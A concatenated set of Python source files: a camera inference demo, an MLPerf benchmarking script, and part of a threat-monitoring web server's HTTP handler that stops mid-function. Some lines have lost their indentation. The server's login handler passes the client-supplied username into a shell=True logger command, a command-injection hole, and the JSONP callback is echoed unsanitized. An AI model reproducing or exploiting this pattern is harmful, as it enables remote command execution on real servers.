                    font_scale=0.42,
                    font_color=(140, 40, 200),
                    line_type=1,
                    dl_corner=(50, 50)):
    """Draw `text` onto `canvas` in place, anchored at `dl_corner`
    (bottom-left corner of the text, per cv2.putText convention).
    """
    cv2.putText(canvas, text, dl_corner, font, font_scale, font_color, line_type)
def infer_loop(q_input, q_output):
    """Worker-process loop: pull (frame, fps) from q_input, run inference,
    push (result, fps, original_frame) to q_output. Runs forever.
    """
    global nn, pre_process, post_process
    nn.init()
    while True:
        img_orig, fps = q_input.get()
        # Camera frames are BGR; the network presumably expects RGB -- confirm
        # against the configured PRE_PROCESSOR.
        img = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
        result, _, _ = run_inference(img, nn, pre_process, post_process)
        q_output.put((result, fps, img_orig))
def show_object_detection(img, result, fps, window_height, window_width, config):
    """Render one object-detection frame: draw predicted boxes and the FPS
    overlay, then display it in the demo window.
    """
    window_img = resize(img, size=[window_height, window_width])
    input_width = config.IMAGE_SIZE[1]
    input_height = config.IMAGE_SIZE[0]
    window_img = add_rectangle(
        config.CLASSES,
        window_img,
        result,
        (input_height, input_width),
    )
    # BUGFIX: the add_fps() return value was previously assigned to an unused
    # local (`img`) while the un-annotated `window_img` was shown; every
    # sibling show_* handler assigns back to window_img, so the FPS overlay
    # was dropped here if add_fps returns a new image.
    window_img = add_fps(window_img, fps)
    window_name = "Object Detection Demo"
    cv2.imshow(window_name, window_img)
def show_classification(img, result, fps, window_height, window_width, config):
    """Render a classification frame: winning-class score and label plus FPS."""
    window_img = resize(img, size=[window_height, window_width])
    result_class = np.argmax(result, axis=1)
    # Score of the winning class; assumes result has shape (1, num_classes) -- confirm.
    add_class_label(window_img, text=str(result[0, result_class][0]), font_scale=0.52, dl_corner=(230, 230))
    add_class_label(window_img, text=config.CLASSES[result_class[0]], font_scale=0.52, dl_corner=(230, 210))
    window_img = add_fps(window_img, fps)
    window_name = "Classification Demo"
    cv2.imshow(window_name, window_img)
def show_semantic_segmentation(img, result, fps, window_height, window_width, config):
    """Blend the predicted segmentation color map over the camera frame and show it."""
    orig_img = resize(img, size=[window_height, window_width])
    colormap = np.array(get_color_map(len(config.CLASSES)), dtype=np.uint8)
    seg_img = label_to_color_image(result, colormap)
    # cv2.resize takes (width, height), unlike the project resize() helper.
    seg_img = cv2.resize(seg_img, dsize=(window_width, window_height))
    # Overlay segmentation at 0.8 weight on top of the full-weight original.
    window_img = cv2.addWeighted(orig_img, 1, seg_img, 0.8, 0)
    window_img = add_fps(window_img, fps)
    window_name = "Semantic Segmentation Demo"
    cv2.imshow(window_name, window_img)
def show_keypoint_detection(img, result, fps, window_height, window_width, config):
    """Draw detected keypoints (scaled from the network input size) plus FPS."""
    window_img = resize(img, size=[window_height, window_width])
    input_width = config.IMAGE_SIZE[1]
    input_height = config.IMAGE_SIZE[0]
    window_img = visualize_keypoint_detection(window_img, result[0], (input_height, input_width))
    window_img = add_fps(window_img, fps)
    window_name = "Keypoint Detection Demo"
    cv2.imshow(window_name, window_img)
def capture_loop(q_input):
    """Capture-process loop: grab 320x240 frames forever and push
    (frame, fps) onto q_input, where fps is averaged over the last 10 frames.
    """
    window = 10  # number of frames the FPS estimate is averaged over
    vc = init_camera(320, 240)
    timestamps = deque([time.perf_counter()] * window)
    while True:
        ok, frame = vc.read()
        if not ok:
            continue
        now = time.perf_counter()
        timestamps.append(now)
        oldest = timestamps.popleft()
        fps = window / (now - oldest)
        q_input.put((frame, fps))
def run_impl(config):
    """Drive the demo: spawn the capture and inference processes, then render
    results on the main thread until ESC is pressed.
    """
    # Set variables
    # Small bounded queues provide backpressure between capture and inference.
    q_input = Queue(2)
    q_output = Queue(4)
    p_capture = Process(target=capture_loop, args=(q_input,))
    p_capture.start()
    p_infer = Process(target=infer_loop, args=(q_input, q_output))
    p_infer.start()
    window_width = 320
    window_height = 240
    # Dispatch table: task name from config -> rendering handler.
    show_handles_table = {
        "IMAGE.OBJECT_DETECTION": show_object_detection,
        "IMAGE.CLASSIFICATION": show_classification,
        "IMAGE.SEMANTIC_SEGMENTATION": show_semantic_segmentation,
        "IMAGE.KEYPOINT_DETECTION": show_keypoint_detection
    }
    show_handle = show_handles_table[config.TASK]
    # ----------- Beginning of Main Loop ---------------
    while True:
        if not q_output.empty():
            result, fps, img = q_output.get()
            show_handle(img, result, fps, window_height, window_width, config)
        key = cv2.waitKey(1)  # Wait for 1ms
        if key == 27:  # ESC to quit
            sleep(1.0)  # Wait for worker's current task is finished
            p_capture.terminate()
            p_infer.terminate()
            return
    # --------------------- End of main Loop -----------------------
def run(model, config_file):
    """Load an inference model and its config, then launch the camera demo.

    Args:
        model: path to a .so (NNLib shared object) or .pb (TensorFlow
            protocol buffer) model file.
        config_file: path to the YAML config describing task and
            pre/post-processing.

    Raises:
        ValueError: if the model file extension is neither .so nor .pb.
            (ValueError subclasses Exception, so existing callers that caught
            the previous generic Exception keep working.)
    """
    global nn, pre_process, post_process
    filename, file_extension = os.path.splitext(model)
    supported_files = ['.so', '.pb']
    if file_extension not in supported_files:
        raise ValueError("""
            Unknown file type. Got %s%s.
            Please check the model file (-m).
            Only .pb (protocol buffer) or .so (shared object) file is supported.
            """ % (filename, file_extension))
    config = load_yaml(config_file)
    pre_process = build_pre_process(config.PRE_PROCESSOR)
    post_process = build_post_process(config.POST_PROCESSOR)
    if file_extension == '.so':  # Shared library
        nn = NNLib()
        nn.load(model)
    elif file_extension == '.pb':  # Protocol Buffer file
        # only load tensorflow if user wants to use GPU
        from lmnet.tensorflow_graph_runner import TensorflowGraphRunner
        nn = TensorflowGraphRunner(model)
    run_impl(config)
# CLI entry point; -l is kept as a deprecated alias of -m.
@click.command(context_settings=dict(help_option_names=['-h', '--help']))
@click.option(
    "-m",
    "-l",
    "--model",
    type=click.Path(exists=True),
    help=u"""
        Inference Model filename
        (-l is deprecated please use -m instead)
    """,
    default="../models/lib/libdlk_fpga.so",
)
@click.option(
    "-c",
    "--config_file",
    type=click.Path(exists=True),
    help=u"Config file Path",
    default="../models/meta.yaml",
)
def main(model, config_file):
    """Warn about deprecated flags, then run the demo."""
    _check_deprecated_arguments()
    run(model, config_file)
def _check_deprecated_arguments():
argument_list = sys.argv
if '-l' in argument_list:
print("Deprecated warning: -l is deprecated please use -m instead")
if __name__ == "__main__":
main()
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
# pylint: disable=missing-docstring
# the datasets we support
# Maps dataset name -> (dataset class, pre-process fn, post-process fn, kwargs).
SUPPORTED_DATASETS = {
    "imagenet":
        (imagenet.Imagenet, dataset.pre_process_vgg, dataset.post_process_offset1,
         {"image_size": [224, 224, 3]}),
    "imagenet_mobilenet":
        (imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.post_process_argmax_offset,
         {"image_size": [224, 224, 3]}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
# 99th-percentile latency targets (seconds) scanned by default.
DEFAULT_LATENCY_BUCKETS = "0.010,0.050,0.100,0.200,0.400"
SUPPORTED_PROFILES = {
    # Base values; a named profile overrides these (see get_args()).
    "defaults": {
        "dataset": "imagenet",
        "backend": "tensorflow",
        "cache": 0,
        "time": 128,
        "max-latency": DEFAULT_LATENCY_BUCKETS,
    },
    "mobilenet-tf": {
        "inputs": "input:0",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "dataset": "imagenet_mobilenet",
        "backend": "tensorflow",
    },
    "mobilenet-onnx": {
        "dataset": "imagenet_mobilenet",
        "outputs": "MobilenetV1/Predictions/Reshape_1:0",
        "backend": "onnxruntime",
    },
    "resnet50-tf": {
        "inputs": "input_tensor:0",
        "outputs": "ArgMax:0",
        "dataset": "imagenet",
        "backend": "tensorflow",
    },
    "resnet50-onnxruntime": {
        "dataset": "imagenet",
        "outputs": "ArgMax:0",
        "backend": "onnxruntime",
    }
}
def get_args():
    """Parse commandline.

    Defaults come from SUPPORTED_PROFILES["defaults"], optionally overridden
    by a named --profile, and are applied only to options the user did not
    set explicitly on the command line.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
    parser.add_argument("--dataset-path", required=True, help="path to the dataset")
    parser.add_argument("--dataset-list", help="path to the dataset list")
    parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
    parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
    parser.add_argument("--model", required=True, help="model file")
    parser.add_argument("--inputs", help="model inputs")
    parser.add_argument("--output", help="test results")
    parser.add_argument("--outputs", help="model outputs")
    parser.add_argument("--backend", help="runtime to use")
    parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
    parser.add_argument("--time", type=int, help="time to scan in seconds")
    parser.add_argument("--count", type=int, help="dataset items to use")
    parser.add_argument("--max-latency", type=str, help="max latency in 99pct tile")
    parser.add_argument("--cache", type=int, default=0, help="use cache")
    args = parser.parse_args()
    # don't use defaults in argparser. Instead we default to a dict, override that with a profile
    # and take this as default unless command line give
    # BUGFIX: copy the defaults dict. The previous code aliased
    # SUPPORTED_PROFILES["defaults"], so update() with a profile mutated the
    # module-level table and leaked profile values into later calls.
    defaults = dict(SUPPORTED_PROFILES["defaults"])
    if args.profile:
        profile = SUPPORTED_PROFILES[args.profile]
        defaults.update(profile)
    for k, v in defaults.items():
        kc = k.replace("-", "_")
        if getattr(args, kc) is None:
            setattr(args, kc, v)
    # Comma-separated options become lists.
    if args.inputs:
        args.inputs = args.inputs.split(",")
    if args.outputs:
        args.outputs = args.outputs.split(",")
    if args.max_latency:
        args.max_latency = [float(i) for i in args.max_latency.split(",")]
    return args
def get_backend(backend):
    """Instantiate the requested inference backend by name.

    Imports are deferred per branch so only the selected backend's
    dependencies are loaded.

    Raises:
        ValueError: for an unrecognized backend name.
    """
    if backend == "tensorflow":
        from backend_tf import BackendTensorflow
        return BackendTensorflow()
    if backend == "onnxruntime":
        from backend_onnxruntime import BackendOnnxruntime
        return BackendOnnxruntime()
    if backend == "null":
        from backend_null import BackendNull
        return BackendNull()
    if backend == "pytorch":
        from backend_pytorch import BackendPytorch
        return BackendPytorch()
    if backend == "tflite":
        from backend_tflite import BackendTflite
        return BackendTflite()
    raise ValueError("unknown backend: " + backend)
class Item:
    """An item that we queue for processing by the thread pool."""
    def __init__(self, query_id, img, label=None):
        """Capture the loadgen query ids, the image batch, the expected
        labels, and the enqueue timestamp (used later to measure latency).
        """
        self.id = query_id
        self.img = img
        self.label = label
        self.start = time.time()
class Runner:
    """Thread pool that runs model predictions from a bounded task queue and
    reports results back to loadgen.
    """
    def __init__(self, model, ds, threads, post_process=None):
        # NOTE(review): `ds` is accepted but never stored -- appears unused; confirm.
        self.tasks = Queue(maxsize=threads * 5)
        self.workers = []
        self.model = model
        self.post_process = post_process
        self.threads = threads
        self.result_list = []
        self.result_dict = {}
    def handle_tasks(self, tasks_queue):
        """Worker thread."""
        while True:
            qitem = tasks_queue.get()
            if qitem is None:
                # None in the queue indicates the parent want us to exit
                tasks_queue.task_done()
                break
            try:
                # run the prediction
                results = self.model.predict({self.model.inputs[0]: qitem.img})
                # and keep track of how long it took
                took = time.time() - qitem.start
                response = []
                for idx, result in enumerate(results[0]):
                    result = self.post_process(result)
                    # NOTE(review): these counter increments are not guarded by a
                    # lock; with multiple worker threads counts could race -- confirm.
                    if qitem.label[idx] == result:
                        self.result_dict["good"] += 1
                    self.result_dict["total"] += 1
                    # FIXME: unclear what to return here
                    response.append(lg.QuerySampleResponse(qitem.id[idx], 0, 0))
                    self.result_list.append(took)
                lg.QuerySamplesComplete(response)
            except Exception as ex:  # pylint: disable=broad-except
                log.error("execute_parallel thread: %s", ex)
            tasks_queue.task_done()
    def start_pool(self):
        """Spawn `threads` daemon workers consuming from the shared task queue."""
        for _ in range(self.threads):
            worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
            worker.daemon = True
            self.workers.append(worker)
            worker.start()
    def start_run(self, result_list, result_dict):
        """Point result accounting at fresh containers for the next test run."""
        self.result_list = result_list
        self.result_dict = result_dict
    def enqueue(self, id, data, label):
        # `id` shadows the builtin; kept as-is for interface compatibility.
        item = Item(id, data, label)
        self.tasks.put(item)
    def finish(self):
        # exit all threads
        # One None sentinel per worker, then wait for them to drain.
        for _ in self.workers:
            self.tasks.put(None)
        for worker in self.workers:
            worker.join()
def add_results(final_results, name, result_dict, result_list, took):
    """Summarize one benchmark run (latency percentiles, qps, accuracy),
    store the summary under `name` in `final_results`, and print a
    one-line report to stdout.
    """
    pct_points = [50., 80., 90., 95., 99., 99.9]
    pct_values = np.percentile(result_list, pct_points).tolist()
    n_items = len(result_list)
    good = result_dict["good"]
    total = result_dict["total"]
    # this is what we record for each run
    entry = {
        "mean": np.mean(result_list),
        "took": took,
        "qps": n_items / took,
        "count": n_items,
        "percentiles": dict(zip(map(str, pct_points), pct_values)),
        "good_items": good,
        "total_items": total,
        "accuracy": 100. * good / total,
    }
    final_results[name] = entry
    # one-line summary to stdout
    tiles = ",".join("{}:{:.4f}".format(p, v) for p, v in zip(pct_points, pct_values))
    print("{} qps={:.2f}, mean={:.6f}, time={:.2f}, acc={:.2f}, tiles={}".format(
        name, entry["qps"], entry["mean"], took, entry["accuracy"], tiles))
def main():
    """Benchmark entry point: build the dataset and backend, warm up, then run
    the loadgen scenarios over each target latency and dump the results.
    """
    args = get_args()
    print(args)
    # find backend
    backend = get_backend(args.backend)
    # override image format if given
    image_format = args.data_format if args.data_format else backend.image_format()
    # dataset to use
    wanted_dataset, preprocessor, postprocessor, kwargs = SUPPORTED_DATASETS[args.dataset]
    ds = wanted_dataset(data_path=args.dataset_path,
                        image_list=args.dataset_list,
                        name=args.dataset,
                        image_format=image_format,
                        pre_process=preprocessor,
                        use_cache=args.cache,
                        count=args.count, **kwargs)
    # load model to backend
    model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
    final_results = {
        "runtime": model.name(),
        "version": model.version(),
        "time": int(time.time()),
        "cmdline": str(args),
    }
    #
    # make one pass over the dataset to validate accuracy
    #
    count = args.count if args.count else ds.get_item_count()
    runner = Runner(model, ds, args.threads, post_process=postprocessor)
    runner.start_pool()
    # warmup
    log.info("warmup ...")
    ds.load_query_samples([0])
    for _ in range(100):
        img, _ = ds.get_samples([0])
        _ = backend.predict({backend.inputs[0]: img})
    def issue_query(query_samples):
        # loadgen callback: map loadgen sample ids to dataset items and enqueue.
        idx = [q.index for q in query_samples]
        query_id = [q.id for q in query_samples]
        data, label = ds.get_samples(idx)
        runner.enqueue(query_id, data, label)
    sut = lg.ConstructSUT(issue_query)
    qsl = lg.ConstructQSL(count, args.time, ds.load_query_samples, ds.unload_query_samples)
    scenarios = [
        # lg.TestScenario.SingleStream,
        lg.TestScenario.MultiStream,
        # lg.TestScenario.Cloud,
        # lg.TestScenario.Offline,
    ]
    for scenario in scenarios:
        for target_latency in args.max_latency:
            log.info("starting {}, latency={}".format(scenario, target_latency))
            settings = lg.TestSettings()
            settings.scenario = scenario
            settings.mode = lg.TestMode.SubmissionRun
            settings.samples_per_query = 4  # FIXME: we don't want to know about this
            settings.target_qps = 1000  # FIXME: we don't want to know about this
            settings.target_latency_ns = int(target_latency * 1000000000)
            result_list = []
            result_dict = {"good": 0, "total": 0}
            runner.start_run(result_list, result_dict)
            start = time.time()
            lg.StartTest(sut, qsl, settings)
            add_results(final_results, "{}-{}".format(scenario, target_latency),
                        result_dict, result_list, time.time() - start)
    runner.finish()
    lg.DestroyQSL(qsl)
    lg.DestroySUT(sut)
    #
    # write final results
    #
    if args.output:
        with open(args.output, "w") as f:
            json.dump(final_results, f, sort_keys=True, indent=4)
|
httpd.py | #!/usr/bin/env python
"""
Copyright (c) 2014-2017 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
    class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
        """HTTP server that handles each request in its own thread."""
        def server_bind(self):
            # Allow fast restarts on the same port (avoid TIME_WAIT bind errors).
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            BaseHTTPServer.HTTPServer.server_bind(self)
        def finish_request(self, *args, **kwargs):
            # Swallow per-request errors so one bad connection can't kill the server.
            try:
                BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()
    class SSLThreadingServer(ThreadingServer):
        """ThreadingServer whose listening socket is wrapped in a pyOpenSSL TLS connection."""
        def __init__(self, server_address, pem, HandlerClass):
            import OpenSSL  # python-openssl
            ThreadingServer.__init__(self, server_address, HandlerClass)
            # The same PEM file provides both the private key and the certificate.
            ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
            ctx.use_privatekey_file(pem)
            ctx.use_certificate_file(pem)
            self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
            self.server_bind()
            self.server_activate()
        def shutdown_request(self, request):
            # TLS shutdown can fail on abruptly closed connections; ignore.
            try:
                request.shutdown()
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def do_GET(self):
            """Serve a GET: dispatch /<name> to self._<name>(params) when such a
            handler exists, otherwise serve static files from HTML_DIR (with
            template expansion, gzip, and If-Modified-Since support).
            """
            path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
            params = {}
            content = None
            skip = False
            if hasattr(self, "data"):
                # POST body forwarded by do_POST().
                params.update(urlparse.parse_qs(self.data))
            if query:
                params.update(urlparse.parse_qs(query))
            for key in params:
                if params[key]:
                    # parse_qs yields lists; keep only the last value per key.
                    params[key] = params[key][-1]
            if path == '/':
                path = "index.html"
            path = path.strip('/')
            extension = os.path.splitext(path)[-1].lower()
            if hasattr(self, "_%s" % path):
                # Dynamic endpoint (e.g. /login -> self._login).
                content = getattr(self, "_%s" % path)(params)
            else:
                path = path.replace('/', os.path.sep)
                path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
                if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
                    path = "%s.html" % path
                # Directory-traversal guard plus content-extension allow-list.
                if ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
                    mtime = time.gmtime(os.path.getmtime(path))
                    if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
                    if if_modified_since and extension not in (".htm", ".html"):
                        if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
                        if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
                            self.send_response(httplib.NOT_MODIFIED)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            skip = True
                    if not skip:
                        content = open(path, "rb").read()
                        last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
                        self.send_response(httplib.OK)
                        self.send_header(HTTP_HEADER.CONNECTION, "close")
                        self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
                        self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
                        if extension not in (".htm", ".html"):
                            self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT")  # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate")  # Reference: http://stackoverflow.com/a/5084555
                        else:
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
                else:
                    self.send_response(httplib.NOT_FOUND)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
            if content is not None:
                # Expand server-side template tokens of the form <!NAME!>.
                for match in re.finditer(r"<\!(\w+)\!>", content):
                    name = match.group(1)
                    _ = getattr(self, "_%s" % name.lower(), None)
                    if _:
                        content = self._format(content, **{ name: _() })
                if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
                    self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
                    _ = cStringIO.StringIO()
                    compress = gzip.GzipFile("", "w+b", 9, _)
                    compress._stream = _
                    compress.write(content)
                    compress.flush()
                    compress.close()
                    content = compress._stream.getvalue()
                self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
            self.end_headers()
            if content:
                self.wfile.write(content)
            self.wfile.flush()
            self.wfile.close()
        def do_POST(self):
            """Read the urlencoded POST body, stash it on self.data, and delegate to do_GET()."""
            length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
            data = self.rfile.read(int(length))
            data = urllib.unquote_plus(data)
            self.data = data
            self.do_GET()
        def get_session(self):
            """Return the live session bound to the request's cookie, or None.

            Expired sessions are deleted; a session whose stored client IP
            differs from this request's IP is ignored (but kept).
            """
            retval = None
            cookie = self.headers.get(HTTP_HEADER.COOKIE)
            if cookie:
                match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        if SESSIONS[session].client_ip != self.client_address[0]:
                            pass
                        elif SESSIONS[session].expiration > time.time():
                            retval = SESSIONS[session]
                        else:
                            del SESSIONS[session]
            return retval
        def delete_session(self):
            """Remove the server-side session referenced by the request cookie (if any)."""
            cookie = self.headers.get(HTTP_HEADER.COOKIE)
            if cookie:
                match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        del SESSIONS[session]
        def version_string(self):
            """Advertise the configured Server header instead of the BaseHTTPServer default."""
            return SERVER_HEADER
        def end_headers(self):
            # Guard so headers are terminated at most once per response
            # (do_GET can reach end_headers through several code paths).
            if not hasattr(self, "_headers_ended"):
                BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
                self._headers_ended = True
        def log_message(self, format, *args):
            # Suppress the default per-request stderr logging.
            return
        def finish(self):
            # Never let a broken client connection propagate out of the handler.
            try:
                BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()
        def _version(self):
            """Template value for the <!VERSION!> token."""
            return VERSION
        def _format(self, content, **params):
            """Replace <!KEY!> template tokens in content with the given values."""
            if content:
                for key, value in params.items():
                    content = content.replace("<!%s!>" % key, value)
            return content
        def _login(self, params):
            """Handle /login: validate nonce-salted SHA256 credentials against
            config.USERS, create a session cookie plus optional per-user IP
            netfilters, and log the attempt via syslog (non-Windows).
            """
            valid = False
            if params.get("username") and params.get("hash") and params.get("nonce"):
                # Each nonce is single-use (replay protection).
                if params.get("nonce") not in DISPOSED_NONCES:
                    DISPOSED_NONCES.add(params.get("nonce"))
                    for entry in (config.USERS or []):
                        entry = re.sub(r"\s", "", entry)
                        # USERS entry format: username:sha256_hash:uid:netfilter
                        username, stored_hash, uid, netfilter = entry.split(':')
                        if username == params.get("username"):
                            try:
                                if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
                                    valid = True
                                    break
                            except:
                                if config.SHOW_DEBUG:
                                    traceback.print_exc()
            if valid:
                session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
                expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
                self.send_response(httplib.OK)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                self.send_header(HTTP_HEADER.SET_COOKIE, "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))))
                if netfilter in ("", "0.0.0.0/0"):
                    netfilters = None
                else:
                    addresses = set()
                    netmasks = set()
                    # Accept ';'/','-separated CIDRs, ranges (a-b), and single IPs.
                    for item in set(re.split(r"[;,]", netfilter)):
                        item = item.strip()
                        if '/' in item:
                            _ = item.split('/')[-1]
                            if _.isdigit() and int(_) >= 16:
                                # Expand networks of /16 or smaller into individual addresses.
                                lower = addr_to_int(item.split('/')[0])
                                mask = make_mask(int(_))
                                upper = lower | (0xffffffff ^ mask)
                                while lower <= upper:
                                    addresses.add(int_to_addr(lower))
                                    lower += 1
                            else:
                                netmasks.add(item)
                        elif '-' in item:
                            _ = item.split('-')
                            lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
                            while lower <= upper:
                                addresses.add(int_to_addr(lower))
                                lower += 1
                        elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
                            addresses.add(item)
                    netfilters = netmasks
                    if addresses:
                        netfilters.add(get_regex(addresses))
                SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
            else:
                # Throttle brute-force attempts.
                time.sleep(UNAUTHORIZED_SLEEP_TIME)
                self.send_response(httplib.UNAUTHORIZED)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            content = "Login %s" % ("success" if valid else "failed")
            if not subprocess.mswindows:
                try:
                    subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
                except Exception:
                    if config.SHOW_DEBUG:
                        traceback.print_exc()
            return content
        def _logout(self, params):
            """Handle /logout: drop the session and redirect to the index page."""
            self.delete_session()
            self.send_response(httplib.FOUND)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.LOCATION, "/")
        def _whoami(self, params):
            """Handle /whoami: return the logged-in username ("" when anonymous)."""
            session = self.get_session()
            username = session.username if session else ""
            self.send_response(httplib.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            return username
        def _check_ip(self, params):
            """Handle /check_ip: return JSON (optionally JSONP via 'callback')
            with ipcat / worst-ASN info for the given address. Requires a session.
            """
            session = self.get_session()
            if session is None:
                self.send_response(httplib.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None
            self.send_response(httplib.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            try:
                result_worst = worst_asns(params.get("address"))
                if result_worst:
                    result_ipcat = result_worst
                else:
                    # Strip a leading "the" from the ipcat description.
                    _ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
                    result_ipcat = _[1] if _[0] == 'the' else _[0]
                return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()
        def _trails(self, params):
            """Handle /trails: return the raw trails file contents."""
            self.send_response(httplib.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            return open(TRAILS_FILE, "rb").read()
        def _ping(self, params):
            """Handle /ping: simple liveness check."""
            self.send_response(httplib.OK)
            self.send_header(HTTP_HEADER.CONNECTION, "close")
            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            return PING_RESPONSE
        def _events(self, params):
            """Handle /events: serve event-log lines for a date ("YYYY-mm-dd")
            or date interval ("YYYY-mm-dd_YYYY-mm-dd"), honoring Range requests
            and filtering lines through the session's IP netfilters.
            """
            session = self.get_session()
            if session is None:
                self.send_response(httplib.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")
                return None
            start, end, size, total = None, None, -1, None
            content = None
            log_exists = False
            dates = params.get("date", "")
            if ".." in dates:
                # Reject path-traversal attempts in the date parameter.
                pass
            elif '_' not in dates:
                # Single-day request.
                try:
